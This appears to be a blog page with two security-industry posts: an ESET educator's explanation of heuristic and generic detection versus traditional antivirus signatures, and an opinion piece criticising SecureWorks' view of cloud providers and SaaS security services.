Let’s start with question 1. When detecting brand new unique threats, regular signatures are useless. There are a variety of heuristic approaches and one of them that is particularly effective is called generic detection. With generic detection we can identify new threats that are based upon existing threats. With a traditional signature a very slight modification to a virus or Trojan will break detection, but with a generic signature detection is not affected by minor changes. Some of the threats are detected with our passive heuristics. The scanner looks at the file and makes a determination that if the file is allowed to execute it will do something bad. Many other threats are detected with our active heuristics. With the active heuristics we build a virtual computer inside the scanning engine and actually run the samples. This allows us to observe what the program is actually doing. The signatures you see in the threatsense updates are only some of the malware we detect.

Now on to question 2. There are a variety of reasons for traditional signatures. In some cases we must update the heuristics to detect new threats and traditional signatures can be a quick way to do that. A bigger reason for traditional signatures is performance. Heuristic analysis takes far more CPU cycles than using traditional signatures. By using traditional signatures we can keep the performance of the product high. Sometimes for very high profile threats a signature is needed because some manager wants his IT person to show them that the threat is detected and not being technical they believe that a name is required for detection.

In reality, the number of signatures a product has is not a good measure of its effectiveness. If one product has 10 million signatures and detects 10 million threats, and another product has 6 million signatures but detects 15 million threats, which product is better?

Traditional signatures and heuristic are complementary technologies. Both are used to increase the effectiveness of virtually every antivirus product today.

Randy Abrams
Director of Technical Education
ESET LLC

The MSPMentor blog had a post following up on Gray Hall’s post about MSSP fading as Cloud Providers expand.  John Moore who wrote the piece for MSPMentor (which is a great resource by the way), actually interviewed Gray to further clarify what he was saying in his original post.  Moore than gave a chance for one of the traditional MSSPs, SecureWorks to respond.  Their response was sadly typical and shows that not only do many traditional MSSPs not realize the game is changing, they don’t understand the new rules and players that Cloud Computing is ushering in.

SecureWorks while acknowledging that up to 80% of their business is still traditional on premises engagements (I wonder what the consulting services percentage is to the whole versus reoccurring revenue) responded with two data points:

1. SecureWorks already delivers such offerings as vulnerability scanning, Web application scanning, and Security Information Management as on-demand services.  Allen Vance, senior product manager at SecureWorks, said “more on-demand services are on the way in the data security and application security fields.”

2. SecureWorks views cloud providers as a channel for its security services; partnering announcements are forthcoming.

If  this wasn’t so pathetic I would laugh. Obviously the SecureWorks team has equated on demand with SaaS services. However, lets be clear they are not the same! On demand services just means that a customer can “self-order” in some automated fashion to have a service (in this case basic scanning) performed via a web interface. It does not talk to the infrastructure, architecture or scalability that cloud based services require and that Service Providers of tomorrow will demand. Integration with these Cloud Providers billing and deployment systems, security of the multi-tenant environments (they don’t even mention if their service is multi-tenant),  APIs for integration are all sadly missing from SecureWorks lexicon here.  They think putting up a service via the web that someone can order and have a scan performed is cloud based SaaS. Having  a security service based in the cloud is not the same as having a cloud security solution. If no one else will, let me be the first to tell them. Guys you have it all wrong! Go back to the drawing board and come back when you have a real SaaS solution.

Secondly the “cloud providers are a channel, announcements are forthcoming” had me envisioning cloud providers as cattle at the slaughterhouse lined up waiting to be butchered.  You can almost see the SecureWorks executives and sales people frothing at the mouth ready to devour this new meal on the hoof. Guys, Cloud Providers are partners not lunch.  If you think you are going to re-package your existing on prem services and try to “fatten up” cloud providers, so that you can develop a new source of revenue, you are sadly mistaken.

MSSPs should be looking at how they can change and adapt to work with cloud providers. There is much they can learn about how customers will be engaged, billed and serviced.  You are not going to shove the round peg in this square hole and be successful.  Understand what IaaS and PaaS is and how it works. How true SaaS and not “on demand” plays into that world.  Otherwise you are doomed to failure.

The bottom line is that if SecureWorks comments in this article are representative of most MSSPs, they really are in for a rough ride in a Cloudy World.

Related articles by Zemanta

• Service Provider of Tomorrow, Part 10: as MSSP and SIEM wither, will SaaS vendors define a new category for Cloud Security solutions? (securecloudreview.com)
• Will the Cloud Rain on the MSSP Parade? (ashimmy.com)
• Top 5 Reasons Why Traditional Managed Security Services Will Fail in the Cloud (securecloudreview.com)

Tweet This Post